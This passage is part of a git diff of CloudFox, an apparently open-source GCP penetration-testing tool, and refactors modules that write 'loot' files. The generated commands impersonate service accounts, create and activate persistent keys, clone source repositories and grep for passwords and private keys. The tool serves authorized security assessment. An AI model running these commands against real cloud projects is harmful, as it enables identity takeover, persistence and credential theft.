m.LootMap["sa-all-emails"] = &internal.LootFile{ - Name: "sa-all-emails", - Contents: "", - } - // Pentest: Impersonation-specific loot - m.LootMap["sa-impersonatable"] = &internal.LootFile{ - Name: "sa-impersonatable", - Contents: "# Service Accounts That Can Be Impersonated\n# Generated by CloudFox\n# These SAs have principals who can impersonate them\n\n", - } - m.LootMap["sa-token-creators"] = &internal.LootFile{ - Name: "sa-token-creators", - Contents: "# Principals Who Can Create Access Tokens (Impersonate)\n# Generated by CloudFox\n# Permission: iam.serviceAccounts.getAccessToken\n\n", - } - m.LootMap["sa-key-creators"] = &internal.LootFile{ - Name: "sa-key-creators", - Contents: "# Principals Who Can Create SA Keys (Persistent Access)\n# Generated by CloudFox\n# Permission: iam.serviceAccountKeys.create\n\n", - } - m.LootMap["sa-privesc-commands"] = &internal.LootFile{ - Name: "sa-privesc-commands", - Contents: "# Service Account Privilege Escalation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + m.LootMap["serviceaccounts-commands"] = &internal.LootFile{ + Name: "serviceaccounts-commands", + Contents: "# Service Account Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *ServiceAccountsModule) addServiceAccountToLoot(sa ServiceAccountAnalysis, projectID string) { - // All service account emails - m.LootMap["sa-all-emails"].Contents += sa.Email + "\n" + keyFileName := strings.Split(sa.Email, "@")[0] - // Impersonation commands - m.LootMap["sa-impersonation-commands"].Contents += fmt.Sprintf( - "# Service Account: %s\n"+ + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# SERVICE ACCOUNT: %s\n"+ + "# ==========================================\n"+ "# Project: %s\n"+ - "gcloud auth print-access-token --impersonate-service-account=%s\n"+ - "gcloud auth print-identity-token --impersonate-service-account=%s\n\n", + "# Display Name: %s\n"+ + "# Disabled: %v\n", sa.Email, projectID, - sa.Email, - sa.Email, + sa.DisplayName, + sa.Disabled, ) - // Key creation commands - m.LootMap["sa-key-creation-commands"].Contents += fmt.Sprintf( - "# Service Account: %s\n"+ - "gcloud iam service-accounts keys create %s-key.json --iam-account=%s --project=%s\n\n", - sa.Email, - strings.Split(sa.Email, "@")[0], - sa.Email, - projectID, - ) - - // High-risk service accounts - if sa.RiskLevel == "HIGH" { - m.LootMap["sa-high-risk"].Contents += fmt.Sprintf( - "# Service Account: %s\n"+ - "# Project: %s\n"+ - "# Risk Level: %s\n"+ - "# Reasons:\n", - sa.Email, - projectID, - sa.RiskLevel, - ) - for _, reason := range sa.RiskReasons { - m.LootMap["sa-high-risk"].Contents += fmt.Sprintf(" - %s\n", reason) - } - m.LootMap["sa-high-risk"].Contents += "\n" - } - - // Old keys - if sa.HasOldKeys { - m.LootMap["sa-old-keys"].Contents += fmt.Sprintf( - "# Service Account: %s\n"+ - "# Project: %s\n"+ - "# Oldest Key Age: %d days\n"+ - "# List keys:\n"+ - "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n", - sa.Email, - projectID, - sa.OldestKeyAge, - sa.Email, - projectID, - ) - } - - // Default service accounts - if sa.IsDefaultSA { - keysInfo := "No user-managed keys" - if sa.HasKeys { - keysInfo = fmt.Sprintf("%d user-managed key(s)", sa.KeyCount) - } - m.LootMap["sa-default-accounts"].Contents += fmt.Sprintf( - "# Service Account: %s\n"+ - "# Type: %s default\n"+ - "# Project: %s\n"+ - "# Keys: %s\n"+ - "# Get IAM policy:\n"+ - "gcloud iam service-accounts get-iam-policy %s --project=%s\n\n", - sa.Email, - sa.DefaultSAType, - projectID, - keysInfo, - sa.Email, - projectID, - ) - } - - // Pentest: Impersonation loot + // Add impersonation info if available if sa.ImpersonationInfo != nil { - info := sa.ImpersonationInfo - - // SAs that can be impersonated - if len(info.TokenCreators) > 0 || len(info.KeyCreators) > 0 || len(info.SAAdmins) > 0 { - m.LootMap["sa-impersonatable"].Contents += fmt.Sprintf( - "## Service Account: %s\n"+ - "## Project: %s\n"+ - "## Risk Level: %s\n", - sa.Email, - projectID, - info.RiskLevel, - ) - if len(info.TokenCreators) > 0 { - m.LootMap["sa-impersonatable"].Contents += "# Token Creators (can impersonate):\n" - for _, tc := range info.TokenCreators { - m.LootMap["sa-impersonatable"].Contents += fmt.Sprintf(" - %s\n", tc) - } - } - if len(info.KeyCreators) > 0 { - m.LootMap["sa-impersonatable"].Contents += "# Key Creators (persistent access):\n" - for _, kc := range info.KeyCreators { - m.LootMap["sa-impersonatable"].Contents += fmt.Sprintf(" - %s\n", kc) - } - } - m.LootMap["sa-impersonatable"].Contents += "\n" + if len(sa.ImpersonationInfo.TokenCreators) > 0 { + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# Token Creators: %s\n", strings.Join(sa.ImpersonationInfo.TokenCreators, ", ")) } - - // Token creators loot - if len(info.TokenCreators) > 0 { - for _, tc := range info.TokenCreators { - m.LootMap["sa-token-creators"].Contents += fmt.Sprintf( - "# %s can impersonate %s\n"+ - "# As %s, run:\n"+ - "gcloud auth print-access-token --impersonate-service-account=%s\n\n", - tc, sa.Email, tc, sa.Email, - ) - } + if len(sa.ImpersonationInfo.KeyCreators) > 0 { + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# Key Creators: %s\n", strings.Join(sa.ImpersonationInfo.KeyCreators, ", ")) } - - // Key creators loot - if len(info.KeyCreators) > 0 { - for _, kc := range info.KeyCreators { - m.LootMap["sa-key-creators"].Contents += fmt.Sprintf( - "# %s can create keys for %s\n"+ - "# As %s, run:\n"+ - "gcloud iam service-accounts keys create key.json --iam-account=%s\n\n", - kc, sa.Email, kc, sa.Email, - ) - } - } - - // Privesc commands - if info.RiskLevel == "CRITICAL" || info.RiskLevel == "HIGH" { - m.LootMap["sa-privesc-commands"].Contents += fmt.Sprintf( - "## Target SA: %s (Risk: %s)\n"+ - "## Project: %s\n", - sa.Email, - info.RiskLevel, - projectID, - ) - for _, reason := range info.RiskReasons { - m.LootMap["sa-privesc-commands"].Contents += fmt.Sprintf("# %s\n", reason) - } - m.LootMap["sa-privesc-commands"].Contents += fmt.Sprintf( - "\n# Step 1: Impersonate the SA\n"+ - "gcloud auth print-access-token --impersonate-service-account=%s\n\n"+ - "# Step 2: Or create a persistent key\n"+ - "gcloud iam service-accounts keys create %s-key.json --iam-account=%s\n\n"+ - "# Step 3: Activate the key\n"+ - "gcloud auth activate-service-account --key-file=%s-key.json\n\n", - sa.Email, - strings.Split(sa.Email, "@")[0], - sa.Email, - strings.Split(sa.Email, "@")[0], - ) + if len(sa.ImpersonationInfo.ActAsUsers) > 0 { + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# ActAs Users: %s\n", strings.Join(sa.ImpersonationInfo.ActAsUsers, ", ")) } } + + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf( + "\n# Impersonation commands:\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n"+ + "gcloud auth print-identity-token --impersonate-service-account=%s\n\n"+ + "# Key creation commands:\n"+ + "gcloud iam service-accounts keys create %s-key.json --iam-account=%s --project=%s\n"+ + "gcloud auth activate-service-account --key-file=%s-key.json\n\n"+ + "# Describe service account:\n"+ + "gcloud iam service-accounts describe %s --project=%s\n\n"+ + "# Get IAM policy for this service account:\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n\n", + sa.Email, + sa.Email, + keyFileName, + sa.Email, + projectID, + keyFileName, + sa.Email, + projectID, + sa.Email, + projectID, + ) } // ------------------------------ // Output Generation // ------------------------------ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main service accounts table + // Service accounts table - one row per IAM binding (impersonation permission) saHeader := []string{ + "Project Name", + "Project ID", "Email", "Display Name", - "Project Name", - "Project", "Disabled", "Default SA", - "Keys", - "Key Age", - "Risk", + "DWD", + "Key Count", + "IAM Role", + "IAM Member", } var saBody [][]string for _, sa := range m.ServiceAccounts { - disabled := "" + disabled := "No" if sa.Disabled { - disabled = "YES" + disabled = "Yes" } - defaultSA := "" + defaultSA := "-" if sa.IsDefaultSA { defaultSA = sa.DefaultSAType } - keys := "-" - if sa.HasKeys { - keys = fmt.Sprintf("%d", sa.KeyCount) - } - - keyAge := "-" - if sa.OldestKeyAge > 0 { - keyAge = fmt.Sprintf("%dd", sa.OldestKeyAge) + // Check if DWD is enabled + dwd := "No" + if sa.OAuth2ClientID != "" { + dwd = "Yes" } - saBody = append(saBody, []string{ - sa.Email, - sa.DisplayName, - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - disabled, - defaultSA, - keys, - keyAge, - sa.RiskLevel, - }) - } - - // Service accounts with keys table - keysHeader := []string{ - "Service Account", - "Project Name", - "Project", - "Key Count", - "Oldest Key Age", - "Has Old Keys", - "Has Expired", - "Risk", - } - - var keysBody [][]string - for _, sa := range m.ServiceAccounts { - if sa.HasKeys { - hasOld := "" - if sa.HasOldKeys { - hasOld = "YES" - } - hasExpired := "" - if sa.HasExpiredKeys { - hasExpired = "YES" + // Count user-managed keys + keyCount := "-" + userKeyCount := 0 + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + userKeyCount++ } - - keysBody = append(keysBody, []string{ - sa.Email, - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - fmt.Sprintf("%d", sa.KeyCount), - fmt.Sprintf("%d days", sa.OldestKeyAge), - hasOld, - hasExpired, - sa.RiskLevel, - }) } - } - - // High-risk service accounts table - highRiskHeader := []string{ - "Service Account", - "Project Name", - "Project", - "Risk Level", - "Risk Reasons", - } - - var highRiskBody [][]string - for _, sa := range m.ServiceAccounts { - if sa.RiskLevel == "HIGH" || sa.RiskLevel == "MEDIUM" { - highRiskBody = append(highRiskBody, []string{ - sa.Email, - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - sa.RiskLevel, - strings.Join(sa.RiskReasons, "; "), - }) + if userKeyCount > 0 { + keyCount = fmt.Sprintf("%d", userKeyCount) } - } - // Default service accounts table - defaultHeader := []string{ - "Service Account", - "Project Name", - "Project", - "Type", - "Has Keys", - "Disabled", - } - - var defaultBody [][]string - for _, sa := range m.ServiceAccounts { - if sa.IsDefaultSA { - hasKeys := "No" - if sa.HasKeys { - hasKeys = fmt.Sprintf("Yes (%d)", sa.KeyCount) + // Build IAM bindings from impersonation info + // One row per IAM binding (member + role type) + hasBindings := false + if sa.ImpersonationInfo != nil { + // Token creators can get access tokens + for _, member := range sa.ImpersonationInfo.TokenCreators { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "TokenCreator", + member, + }) + } } - disabled := "No" - if sa.Disabled { - disabled = "Yes" + // Key creators can create keys + for _, member := range sa.ImpersonationInfo.KeyCreators { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "KeyAdmin", + member, + }) + } } + // ActAs users can impersonate + for _, member := range sa.ImpersonationInfo.ActAsUsers { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "ActAs", + member, + }) + } + } + // SA Admins have full control + for _, member := range sa.ImpersonationInfo.SAAdmins { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "SAAdmin", + member, + }) + } + } + // SignBlob users + for _, member := range sa.ImpersonationInfo.SignBlobUsers { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "SignBlob", + member, + }) + } + } + // SignJwt users + for _, member := range sa.ImpersonationInfo.SignJwtUsers { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "SignJwt", + member, + }) + } + } + } - defaultBody = append(defaultBody, []string{ - sa.Email, + // If no IAM bindings, still show the SA with empty IAM columns + if !hasBindings { + saBody = append(saBody, []string{ m.GetProjectName(sa.ProjectID), sa.ProjectID, - sa.DefaultSAType, - hasKeys, + sa.Email, + sa.DisplayName, disabled, + defaultSA, + dwd, + keyCount, + "-", + "-", }) } } - // Collect loot files + // Collect loot files (only non-empty ones) var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } - // Build tables + // Build tables - just one table now tables := []internal.TableFile{ { Name: "serviceaccounts", @@ -717,88 +543,6 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal }, } - // Add keys table if there are any - if len(keysBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "serviceaccounts-keys", - Header: keysHeader, - Body: keysBody, - }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d service account(s) with user-managed keys", len(keysBody)), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) - } - - // Add high-risk table if there are any - if len(highRiskBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "serviceaccounts-high-risk", - Header: highRiskHeader, - Body: highRiskBody, - }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d high/medium risk service account(s)", len(highRiskBody)), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) - } - - // Add default service accounts table if there are any - if len(defaultBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "serviceaccounts-default", - Header: defaultHeader, - Body: defaultBody, - }) - } - - // Pentest: Impersonation table - impersonationHeader := []string{ - "Service Account", - "Project Name", - "Project", - "Token Creators", - "Key Creators", - "ActAs Users", - "Risk", - } - - var impersonationBody [][]string - impersonatableCount := 0 - for _, sa := range m.ServiceAccounts { - if sa.ImpersonationInfo != nil { - info := sa.ImpersonationInfo - if len(info.TokenCreators) > 0 || len(info.KeyCreators) > 0 || len(info.ActAsUsers) > 0 { - impersonatableCount++ - tokenCreators := "-" - if len(info.TokenCreators) > 0 { - tokenCreators = fmt.Sprintf("%d", len(info.TokenCreators)) - } - keyCreators := "-" - if len(info.KeyCreators) > 0 { - keyCreators = fmt.Sprintf("%d", len(info.KeyCreators)) - } - actAsUsers := "-" - if len(info.ActAsUsers) > 0 { - actAsUsers = fmt.Sprintf("%d", len(info.ActAsUsers)) - } - - impersonationBody = append(impersonationBody, []string{ - sa.Email, - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - tokenCreators, - keyCreators, - actAsUsers, - info.RiskLevel, - }) - } - } - } - - if len(impersonationBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "serviceaccounts-impersonation", - Header: impersonationHeader, - Body: impersonationBody, - }) - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d service account(s) with impersonation risks", impersonatableCount), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) - } - output := ServiceAccountsOutput{ Table: tables, Loot: lootFiles, @@ -815,9 +559,9 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames m.Account, output, ) @@ -826,3 +570,13 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal m.CommandCounter.Error++ } } + +// extractEmailFromMember extracts the email/identity from an IAM member string +// e.g., "user:alice@example.com" -> "alice@example.com" +// e.g., "serviceAccount:sa@project.iam.gserviceaccount.com" -> "sa@project.iam..." +func extractEmailFromMember(member string) string { + if idx := strings.Index(member, ":"); idx != -1 { + return member[idx+1:] + } + return member +} diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go index 86f0005a..f44c6d97 100644 --- a/gcp/commands/serviceagents.go +++ b/gcp/commands/serviceagents.go @@ -93,24 +93,18 @@ func (m *ServiceAgentsModule) Execute(ctx context.Context, logger internal.Logge return } - // Count cross-project and high-risk + // Count cross-project agents crossProjectCount := 0 - highRiskCount := 0 for _, agent := range m.Agents { if agent.IsCrossProject { crossProjectCount++ } - if agent.RiskLevel == "HIGH" { - highRiskCount++ - } } - logger.SuccessM(fmt.Sprintf("Found %d service agent(s)", len(m.Agents)), globals.GCP_SERVICEAGENTS_MODULE_NAME) if crossProjectCount > 0 { - logger.InfoM(fmt.Sprintf("[INFO] %d cross-project service agents detected", crossProjectCount), globals.GCP_SERVICEAGENTS_MODULE_NAME) - } - if highRiskCount > 0 { - logger.InfoM(fmt.Sprintf("[PENTEST] %d high-risk service agents with elevated permissions!", highRiskCount), globals.GCP_SERVICEAGENTS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d service agent(s) (%d cross-project)", len(m.Agents), crossProjectCount), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d service agent(s)", len(m.Agents)), globals.GCP_SERVICEAGENTS_MODULE_NAME) } m.writeOutput(ctx, logger) @@ -150,160 +144,104 @@ func (m *ServiceAgentsModule) processProject(ctx context.Context, projectID stri // Loot File Management // ------------------------------ func (m *ServiceAgentsModule) initializeLootFiles() { - m.LootMap["service-agents-all"] = &internal.LootFile{ - Name: "service-agents-all", - Contents: "# Google-Managed Service Agents\n# Generated by CloudFox\n\n", - } - m.LootMap["service-agents-highrisk"] = &internal.LootFile{ - Name: "service-agents-highrisk", - Contents: "# High-Risk Service Agents\n# Generated by CloudFox\n# These service agents have elevated permissions\n\n", - } - m.LootMap["service-agents-crossproject"] = &internal.LootFile{ - Name: "service-agents-crossproject", - Contents: "# Cross-Project Service Agents\n# Generated by CloudFox\n# Service agents from other projects with access here\n\n", + m.LootMap["serviceagents-commands"] = &internal.LootFile{ + Name: "serviceagents-commands", + Contents: "# Service Agents Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *ServiceAgentsModule) addAgentToLoot(agent serviceagentsservice.ServiceAgentInfo) { - // All agents - m.LootMap["service-agents-all"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Email: %s\n"+ - "## Service: %s\n"+ - "## Description: %s\n"+ - "## Roles:\n", - agent.RiskLevel, agent.ServiceName, - agent.Email, agent.ServiceName, agent.Description, - ) - for _, role := range agent.Roles { - m.LootMap["service-agents-all"].Contents += fmt.Sprintf("## - %s\n", role) - } - m.LootMap["service-agents-all"].Contents += "\n" - - // High-risk agents - if agent.RiskLevel == "HIGH" || agent.RiskLevel == "MEDIUM" { - m.LootMap["service-agents-highrisk"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Email: %s\n"+ - "## Project: %s\n"+ - "## Roles: %s\n"+ - "## Risks:\n", - agent.RiskLevel, agent.ServiceName, - agent.Email, agent.ProjectID, - strings.Join(agent.Roles, ", "), - ) - for _, reason := range agent.RiskReasons { - m.LootMap["service-agents-highrisk"].Contents += fmt.Sprintf("## - %s\n", reason) - } - m.LootMap["service-agents-highrisk"].Contents += "\n" + crossProjectNote := "" + if agent.IsCrossProject { + crossProjectNote = " [CROSS-PROJECT]" } - // Cross-project agents - if agent.IsCrossProject { - m.LootMap["service-agents-crossproject"].Contents += fmt.Sprintf( - "## [CROSS-PROJECT] %s\n"+ - "## Email: %s\n"+ - "## Has access to project: %s\n"+ - "## Roles: %s\n"+ - "## \n"+ - "## This service agent is from a DIFFERENT project but has access here.\n"+ - "## This could indicate shared services or potential lateral movement path.\n\n", - agent.ServiceName, agent.Email, agent.ProjectID, - strings.Join(agent.Roles, ", "), - ) + m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# SERVICE AGENT: %s%s (Project: %s)\n"+ + "# ==========================================\n"+ + "# Email: %s\n"+ + "# Description: %s\n", + agent.ServiceName, crossProjectNote, agent.ProjectID, + agent.Email, agent.Description, + ) + + if len(agent.Roles) > 0 { + m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf("# Roles: %s\n", strings.Join(agent.Roles, ", ")) } + + m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf( + "\n# Get IAM policy for project:\n"+ + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s' --format='table(bindings.role)'\n"+ + "# Test impersonation (requires iam.serviceAccounts.getAccessToken):\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + agent.ProjectID, agent.Email, + agent.Email, + ) } // ------------------------------ // Output Generation // ------------------------------ func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main agents table + // Main agents table - one row per role header := []string{ - "Risk", + "Project Name", + "Project ID", "Service", "Email", - "Roles", + "Role", "Cross-Project", - "Project Name", - "Project", } var body [][]string for _, agent := range m.Agents { - rolesDisplay := strings.Join(agent.Roles, ", ") - if len(rolesDisplay) > 50 { - rolesDisplay = rolesDisplay[:50] + "..." - } - crossProject := "No" if agent.IsCrossProject { - crossProject = "YES" + crossProject = "Yes" } - // Shorten email for display - emailDisplay := agent.Email - if len(emailDisplay) > 40 { - parts := strings.Split(emailDisplay, "@") - if len(parts) == 2 { - emailDisplay = parts[0][:10] + "...@" + parts[1] + // One row per role + if len(agent.Roles) > 0 { + for _, role := range agent.Roles { + body = append(body, []string{ + m.GetProjectName(agent.ProjectID), + agent.ProjectID, + agent.ServiceName, + agent.Email, + role, + crossProject, + }) } + } else { + // Agent with no roles + body = append(body, []string{ + m.GetProjectName(agent.ProjectID), + agent.ProjectID, + agent.ServiceName, + agent.Email, + "-", + crossProject, + }) } - - body = append(body, []string{ - agent.RiskLevel, - agent.ServiceName, - emailDisplay, - rolesDisplay, - crossProject, - m.GetProjectName(agent.ProjectID), - agent.ProjectID, - }) - } - - // By service summary - serviceCounts := make(map[string]int) - for _, agent := range m.Agents { - serviceCounts[agent.ServiceName]++ - } - - summaryHeader := []string{ - "Service", - "Count", - } - - var summaryBody [][]string - for service, count := range serviceCounts { - summaryBody = append(summaryBody, []string{ - service, - fmt.Sprintf("%d", count), - }) } // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } tables := []internal.TableFile{ { - Name: "service-agents", + Name: globals.GCP_SERVICEAGENTS_MODULE_NAME, Header: header, Body: body, }, } - if len(summaryBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "service-agents-summary", - Header: summaryHeader, - Body: summaryBody, - }) - } - output := ServiceAgentsOutput{ Table: tables, Loot: lootFiles, diff --git a/gcp/commands/sourcerepos.go b/gcp/commands/sourcerepos.go index d5780797..175b70e1 100644 --- a/gcp/commands/sourcerepos.go +++ b/gcp/commands/sourcerepos.go @@ -132,41 +132,51 @@ func (m *SourceReposModule) processProject(ctx context.Context, projectID string // Loot File Management // ------------------------------ func (m *SourceReposModule) initializeLootFiles() { - m.LootMap["source-repos-clone"] = &internal.LootFile{ - Name: "source-repos-clone", - Contents: "# Cloud Source Repository Clone Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["source-repos-secrets-search"] = &internal.LootFile{ - Name: "source-repos-secrets-search", - Contents: "# Search Cloned Repos for Secrets\n# Generated by CloudFox\n# Run after cloning repositories\n\n", + m.LootMap["sourcerepos-commands"] = &internal.LootFile{ + Name: "sourcerepos-commands", + Contents: "# Cloud Source Repository Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *SourceReposModule) addRepoToLoot(repo sourcereposservice.RepoInfo) { - // Clone commands - m.LootMap["source-repos-clone"].Contents += fmt.Sprintf( - "# Repository: %s (Project: %s)\n", + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# REPOSITORY: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n", repo.Name, repo.ProjectID, ) + if repo.Size > 0 { - m.LootMap["source-repos-clone"].Contents += fmt.Sprintf("# Size: %d bytes\n", repo.Size) + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Size: %d bytes\n", repo.Size) } if repo.MirrorConfig { - m.LootMap["source-repos-clone"].Contents += fmt.Sprintf("# Mirrors: %s\n", repo.MirrorURL) + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Mirrors: %s\n", repo.MirrorURL) + } + if repo.PubsubConfigs > 0 { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Pub/Sub Triggers: %d\n", repo.PubsubConfigs) + } + + // IAM bindings summary + if len(repo.IAMBindings) > 0 { + m.LootMap["sourcerepos-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range repo.IAMBindings { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } } - m.LootMap["source-repos-clone"].Contents += fmt.Sprintf( - "gcloud source repos clone %s --project=%s\n\n", - repo.Name, repo.ProjectID, - ) - // Secret search commands - m.LootMap["source-repos-secrets-search"].Contents += fmt.Sprintf( - "# Search %s for secrets:\n"+ - "cd %s\n"+ - "grep -rE '(password|secret|api[_-]?key|private[_-]?key|AWS_|GOOGLE_|token)' . --include='*'\n"+ + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf( + "\n# Clone repository:\n"+ + "gcloud source repos clone %s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud source repos get-iam-policy %s --project=%s\n\n"+ + "# Search for secrets after cloning:\n"+ + "cd %s && grep -rE '(password|secret|api[_-]?key|private[_-]?key|AWS_|GOOGLE_|token)' . --include='*'\n"+ "find . -name '*.pem' -o -name '*.key' -o -name '.env*' -o -name '*credential*' -o -name '*.tfvars'\n"+ "grep -rE 'BEGIN (RSA |DSA |EC |OPENSSH )?PRIVATE KEY' .\n\n", - repo.Name, repo.Name, + repo.Name, repo.ProjectID, + repo.Name, repo.ProjectID, + repo.Name, ) } @@ -174,15 +184,17 @@ func (m *SourceReposModule) addRepoToLoot(repo sourcereposservice.RepoInfo) { // Output Generation // ------------------------------ func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Repos table + // Repos table - one row per IAM binding header := []string{ + "Project Name", + "Project ID", "Name", "Size", "Mirror", + "Mirror URL", "Triggers", - "Risk", - "Project Name", - "Project", + "IAM Role", + "IAM Member", } var body [][]string @@ -199,25 +211,52 @@ func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Log } mirror := "No" + mirrorURL := "-" if repo.MirrorConfig { mirror = "Yes" + mirrorURL = repo.MirrorURL } - body = append(body, []string{ - repo.Name, - sizeDisplay, - mirror, - fmt.Sprintf("%d", repo.PubsubConfigs), - repo.RiskLevel, - m.GetProjectName(repo.ProjectID), - repo.ProjectID, - }) + triggers := "-" + if repo.PubsubConfigs > 0 { + triggers = fmt.Sprintf("%d", repo.PubsubConfigs) + } + + // One row per IAM binding + if len(repo.IAMBindings) > 0 { + for _, binding := range repo.IAMBindings { + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repo.ProjectID, + repo.Name, + sizeDisplay, + mirror, + mirrorURL, + triggers, + binding.Role, + binding.Member, + }) + } + } else { + // Repo with no IAM bindings + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repo.ProjectID, + repo.Name, + sizeDisplay, + mirror, + mirrorURL, + triggers, + "-", + "-", + }) + } } // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/spanner.go b/gcp/commands/spanner.go index 041ae97e..92bdb1e4 100644 --- a/gcp/commands/spanner.go +++ b/gcp/commands/spanner.go @@ -17,13 +17,20 @@ var GCPSpannerCommand = &cobra.Command{ Use: globals.GCP_SPANNER_MODULE_NAME, Aliases: []string{"cloud-spanner"}, Short: "Enumerate Cloud Spanner instances and databases", - Long: `Enumerate Cloud Spanner instances and their databases.`, - Run: runGCPSpannerCommand, + Long: `Enumerate Cloud Spanner instances and databases with IAM bindings. + +Features: +- Lists all Spanner instances with configuration details +- Shows databases within each instance with encryption info +- Enumerates IAM bindings at both instance and database levels +- Generates gcloud commands for further analysis`, + Run: runGCPSpannerCommand, } type SpannerModule struct { gcpinternal.BaseGCPModule Instances []spannerservice.SpannerInstanceInfo + Databases []spannerservice.SpannerDatabaseInfo LootMap map[string]*internal.LootFile mu sync.Mutex } @@ -45,6 +52,7 @@ func runGCPSpannerCommand(cmd *cobra.Command, args []string) { module := &SpannerModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), Instances: []spannerservice.SpannerInstanceInfo{}, + Databases: []spannerservice.SpannerDatabaseInfo{}, LootMap: make(map[string]*internal.LootFile), } module.initializeLootFiles() @@ 